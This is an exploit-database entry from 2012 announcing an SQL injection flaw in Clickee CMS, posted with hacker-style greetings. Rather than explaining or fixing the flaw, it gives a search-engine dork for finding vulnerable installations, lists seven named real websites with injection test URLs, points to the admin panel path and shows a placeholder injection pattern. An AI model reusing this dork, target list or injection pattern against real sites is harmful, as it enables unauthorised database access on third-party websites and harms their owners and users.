Clickee CMS SQL Injection Vulnerability

2012-04-19T00:00:00
ID 1337DAY-ID-18076
Type zdt
Reporter xDarkSton3x
Modified 2012-04-19T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ##################################################
# Exploit Title: Clickee CMS Vuln [ Sqli ]
# Vendor: http://www.clickee.com/
# Date: 18/04/2012
# Author: xDarkSton3x
#Dork: intext:Design by Estilo y Diseño - www.estilod.com   -   intext:Design by Estilo y Diseño - www.clickee.com
# E-mail : [email protected]
# Category: webapps
# Example Sites : 
http://www.comutv.org/php/sitioslistar.php?ciudad=1'
http://www.clickee.com/php/productosver.php?ciudad=1&idproducto=17'
http://www.encuentrodecreativos.com/php/sitioslistar.php?ciudad=1&id_inicio=10'
http://www.inversionesmeybar.com/php/sitioslistar.php?ciudad=1&id_inicio='
http://www.acom-online.org/php/sitioslistar.php?ciudad=1'
http://www.estilod.com/php/tipsver.php?servicio=120&ciudad=1'
http://www.alejandromonsalve.com/php/sitioslistar.php?ciudad=1'

Admin Panel: admin/admin.php

##################################################

[~]Exploit/p0c :
http://www.site.com/php/x.php?var=[sqli]

Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng]



#  0day.today [2018-03-14]  #